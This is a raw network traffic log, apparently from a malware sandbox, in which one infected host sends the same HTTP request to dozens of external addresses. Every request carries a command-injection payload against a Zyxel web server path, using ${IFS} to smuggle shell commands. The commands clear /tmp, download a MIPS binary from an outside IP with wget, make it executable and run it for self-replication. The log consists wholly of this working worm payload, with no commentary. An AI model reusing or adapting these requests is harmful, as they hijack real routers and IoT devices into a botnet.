                                                Jan 12, 2024 18:16:11.166985989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1432192.168.2.2341812147.188.116.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167005062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1433192.168.2.2359020179.57.45.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167071104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1434192.168.2.23362385.145.138.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167098999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1435192.168.2.2358028121.129.3.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167129040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1436192.168.2.233303032.48.99.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167169094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1437192.168.2.235775859.0.59.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167190075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1438192.168.2.2351920147.106.144.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167248964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1439192.168.2.235093647.240.89.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167264938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1440192.168.2.2358556109.232.136.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167325974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1441192.168.2.2349794221.137.45.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167356014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1442192.168.2.2344862125.205.219.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167413950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1443192.168.2.2336842121.44.114.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167438984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1444192.168.2.235831841.227.221.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167469025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1445192.168.2.2360624184.69.248.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167521000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1446192.168.2.2339086155.188.127.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167546034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1447192.168.2.2343276181.51.198.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167574883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1448192.168.2.2346816101.0.115.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167635918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1449192.168.2.235970650.41.183.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167661905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1450192.168.2.2340252218.67.214.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167694092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1451192.168.2.234970818.221.119.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167726994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1452192.168.2.2337692103.255.226.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167767048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1453192.168.2.2355808118.17.51.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167800903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1454192.168.2.2348546218.119.40.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167835951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1455192.168.2.235837061.144.68.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167884111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1456192.168.2.2336130209.185.119.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167927027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1457192.168.2.23362729.59.163.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167948961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1458192.168.2.233348838.5.21.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.167996883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1459192.168.2.2349500139.103.187.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168029070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1460192.168.2.2345552173.94.2.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168066025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1461192.168.2.233399275.199.131.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168113947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1462192.168.2.234231023.134.120.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168144941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1463192.168.2.2347000179.62.27.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168176889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1464192.168.2.2341272100.141.206.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168229103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1465192.168.2.234336464.237.20.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168260098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1466192.168.2.234771238.229.154.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168287992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1467192.168.2.2349512141.88.165.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168323040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1468192.168.2.234841464.153.9.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168395996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1469192.168.2.235924264.141.16.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168438911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1470192.168.2.2337998100.36.140.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168479919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1471192.168.2.2356490160.113.164.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168521881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1472192.168.2.234837839.92.104.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168575048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1473192.168.2.234702617.106.199.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168633938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1474192.168.2.233912263.79.215.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168669939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1475192.168.2.235149069.232.209.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168693066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1476192.168.2.2344466210.35.154.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168739080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1477192.168.2.2342566222.103.238.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168792963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1478192.168.2.233784076.149.18.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168823957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1479192.168.2.234547842.132.5.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168868065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1480192.168.2.234846064.208.175.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168900967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1481192.168.2.2358452143.9.81.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168950081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1482192.168.2.2343790123.97.100.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.168991089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1483192.168.2.233612666.152.232.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169024944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1484192.168.2.2356640118.29.136.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169053078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1485192.168.2.2336374126.111.76.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169068098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1486192.168.2.2351498206.183.250.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169122934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1487192.168.2.234084280.229.180.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169152975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1488192.168.2.235193285.57.33.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169200897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1489192.168.2.2359720173.213.242.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169250011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1490192.168.2.2350160173.131.85.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169270039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1491192.168.2.2350894171.76.60.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169305086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1492192.168.2.2345408207.210.204.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169343948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1493192.168.2.2350632152.132.107.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.169384956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1494192.168.2.2335884132.50.164.21443
                                                TimestampBytes transferredDirectionData
